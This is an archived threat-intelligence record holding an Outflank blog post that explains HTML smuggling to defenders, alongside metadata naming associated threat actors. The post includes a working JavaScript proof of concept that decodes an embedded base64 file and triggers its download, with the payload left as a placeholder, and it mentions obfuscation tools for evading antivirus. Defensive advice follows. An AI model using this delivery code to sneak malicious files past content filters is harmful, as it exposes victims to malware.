{
	"id": "0f6e051d-16cd-476f-a971-0fa485e4e32e",
	"created_at": "2026-04-06T00:11:27.332591Z",
	"updated_at": "2026-04-10T03:31:13.640653Z",
	"deleted_at": null,
	"sha1_hash": "a2f3d15cfdecd95f719c1a7301462655aca23438",
	"title": "HTML smuggling explained | Outflank",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 366225,
	"plain_text": "HTML smuggling explained | Outflank\nBy Stan\nPublished: 2018-08-14 · Archived: 2026-04-05 19:24:49 UTC\nUsing a combination of HTML5 and JavaScript to sneak malicious files past content filters is not a new offensive\ntechnique. This mechanism has been incorporated into popular offensive frameworks such as Demiguise and\nSharpShooter for example. However, from our discussions and trainings with blue teams, we have learned that\nmany defenders are not aware of this technique or its implications. In this blog post, we will explain how a few\nlines of JavaScript have big impact on perimeter security.\nHTML5 download attribute\nHTML5 introduced the “download” attribute for anchor tags. Consider the following line of HTML, which is\nsupported by all modern browsers:\n[Click](/files/doc123.doc) When a user clicks on the hyperlink, the download attribute instructs the browser to download the target pointed\nto by the href attribute and save it to disk as “myfile.doc”. Of course, the anchor and its download attribute can\nalso be created using JavaScript instead of HTML:\nvar myAnchor = document.createElement('a');\nmyAnchor.download = 'filename.doc';\nBlobs and URLs\nNothing major so far, right? Wait until we combine this with JavaScript Blobs. A Blob is an immutable object that\nrepresents raw data. Blobs allow you to construct file-like objects on the client that you can pass to JavaScript\nAPIs that expect URLs. Instead of requiring that the web server provides the file, the Blob can be constructed\nlocally using pure JavaScript.\nvar myBlob = new Blob([myData], {type: 'octet/stream'});\nThis line creates a Blob of MIME type “octet/stream” and fills is with the data contained in variable myData. We\ncan then use URL.createObjectURL to create a URL from our Blob object and have an anchor point to it:\nvar myUrl = window.URL.createObjectURL(blob);\nmyAnchor.href = myUrl;\nLastly, we can simulate a click on the anchor object using JavaScript’s HTMLElement.click() method:\nmyAnchor.click();\nhttps://outflank.nl/blog/2018/08/14/html-smuggling-explained/\nPage 1 of 4\n\nThis will result in triggering the anchor’s click event, which in turn points to our Blob and which will be\r\ndownloaded as “filename.doc” (since we specified the download attribute). These features are supported by all\r\nmajor modern browsers. For older versions of Internet Explorer (not Edge) we can revert to the msSaveBlob\r\nmethod to save a Blob object to disk.\r\nExample code and demo\r\nPutting it all together, the following code is a simple HTML smuggling proof of concept that delivers a file solely\r\nusing HTML5 and JavaScript:\r\nfunction base64ToArrayBuffer(base64) {\r\n var binary_string = window.atob(base64);\r\n var len = binary_string.length;\r\n var bytes = new Uint8Array( len );\r\n for (var i = 0; i \u003c len; i++) { bytes[i] = binary_string.charCodeAt(i); }\r\n return bytes.buffer;\r\n}\r\nvar file ='\u003c\u003c BASE64 ENCODING OF MALICIOUS FILE \u003e\u003e';\r\nvar data = base64ToArrayBuffer(file);\r\nvar blob = new Blob([data], {type: 'octet/stream'});\r\nvar fileName = 'outflank.doc';\r\nif(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);\r\nelse {\r\n var a = document.createElement('a');\r\n document.body.appendChild(a);\r\n a.style = 'display: none';\r\n var url = window.URL.createObjectURL(blob);\r\n a.href = url;\r\n a.download = fileName;\r\n a.click();\r\n window.URL.revokeObjectURL(url);\r\n}\r\nWant to test this in your web brower? Visit our demo page here. This web page delivers an MS Office document\r\nwith an innocent macro through HTML smuggling. Note that the decoding of the document payload and the\r\nsubsequent construction of the download all happen in JavaScript in your web browser. The MS Office document\r\nis only served encoded in JavaScript. The only MIME type that goes over the wire is “text/html”.\r\nIn this example an MS Office document is served, but we can set arbitrary file extension for the download\r\nattribute. Note that browser-based restrictions and configurations for downloading certain file types (e.g. .exe)\r\napply as if this was an usual download.\r\nObfuscation\r\nhttps://outflank.nl/blog/2018/08/14/html-smuggling-explained/\r\nPage 2 of 4\n\nIn the proof of concept code listed above, the actual payload file to be delivered is simply base64 encoded. Of\r\ncourse, this could be easily detected by any content inspection measures in the perimeter. Hence, red teamers and\r\nmalicious attackers use more advanced techniques to encapsulate their payloads in HTML or JavaScript. For\r\nexample, Arno0x’s EmbedInHTTML uses an RC4 decryption routine to decrypt the payload on the fly. MDSec’s\r\nadaptation of this HTML smuggling code in their framework SharpShooter is currently detected by a very small\r\nnumber of AV engines. Note that this detection is signature based and can be easily evaded using common\r\nJavaScript obfuscation techniques. If you need pointers on such techniques then check out JavaScript obfuscator\r\n(online version), JS Fuck, or this academic paper.\r\nImpact\r\nSo what?\r\nThe following picture graphically explains what is happening here:\r\nThe endpoint retrieves a web page (containing only HTML and JavaScript) from the web server. Hence, any\r\ndefensive systems in your perimeter will only see a combination of HTML and JavaScript passing over the wire.\r\nAs a result, perimeter-based detection of malicious content based on MIME types is rendered useless by this\r\ntechnique (there is no .doc going over the wire!). When the web page is rendered in the browser of the endpoint,\r\nthe malicious file is decoded using JavaScript, placed in a Blob and subsequently downloaded. These last parts\r\nsolely happen in the web browser of the victim.\r\nDefense\r\nhttps://outflank.nl/blog/2018/08/14/html-smuggling-explained/\r\nPage 3 of 4\n\nHow can I prevent this technique?\r\nHTML smuggling uses legitimate features of HTML5 combined with JavaScript that are supported by all modern\r\nbrowsers. Disabling JavaScript would be an effective measure, but in most corporate environments that is simply\r\nnot an option. We are not aware of options to disable download attributes in anchors or blobs in modern browsers\r\n(and yikes, that could seriously break stuff). And even if that would be possible then there are other mechanisms\r\nto achieve the same effect (e.g. consider Data URLs). In short, preventing HTML smuggling itself is considered\r\ninfeasible.\r\nThen how about detection?\r\nOne could argue that it is feasible to develop signatures for content inspection to detect particular implementations\r\nof HTML smuggling. However, due to obfuscation and other JavaScript techniques there is virtually an unlimited\r\nnumber of ways in which HTML smuggling could be coded. Hence, trying to detect all possible variations would\r\nbe fighting a losing battle. Moreover, these techniques are not only used offensively, but are also used by many\r\nlegitimate websites and frameworks.\r\nSo I’m doomed?\r\nNo. It only acknowledges a very important security paradigm: defense in depth. Don’t consider security to be like\r\na coconut: hard on the outside, soft on the inside. Assume that malicious content can be delivered to your\r\nendpoints, despite your tight perimeter security. This teaches us that in addition to perimeter security, we should\r\npay attention to what is behind our perimeter, most notably endpoints.\r\nFrom a preventive perspective, implement measures that limit the impact of malicious content that is delivered to\r\nendpoints, such as application hardening and script control and hardening of user applications (such as MS\r\nOffice).\r\nAnd in order to detect incidents regarding malicious content on your endpoints, make sure that you have the right\r\nsecurity telemetry available. For example, consider using Attack Surface Reduction in audit mode (tip: learn\r\nwhich rules yield a small number of false positives and turn them to blocking mode), monitoring process creation\r\nand MS Office macro execution using SysMon. Want more? Check out Sean Meatcalf’s ultimate resource on\r\ncreating a secure baseline for Windows workstations.\r\nSource: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/\r\nhttps://outflank.nl/blog/2018/08/14/html-smuggling-explained/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://outflank.nl/blog/2018/08/14/html-smuggling-explained/"
	],
	"report_names": [
		"html-smuggling-explained"
	],
	"threat_actors": [
		{
			"id": "a13b5ca4-fb52-44a9-aa5a-595eca6789ed",
			"created_at": "2022-10-25T15:50:23.4331Z",
			"updated_at": "2026-04-10T02:00:05.381716Z",
			"deleted_at": null,
			"main_name": "Sharpshooter",
			"aliases": [
				"Sharpshooter"
			],
			"source_name": "MITRE:Sharpshooter",
			"tools": [
				"Rising Sun"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434287,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a2f3d15cfdecd95f719c1a7301462655aca23438.pdf",
		"text": "https://archive.orkl.eu/a2f3d15cfdecd95f719c1a7301462655aca23438.txt",
		"img": "https://archive.orkl.eu/a2f3d15cfdecd95f719c1a7301462655aca23438.jpg"
	}
}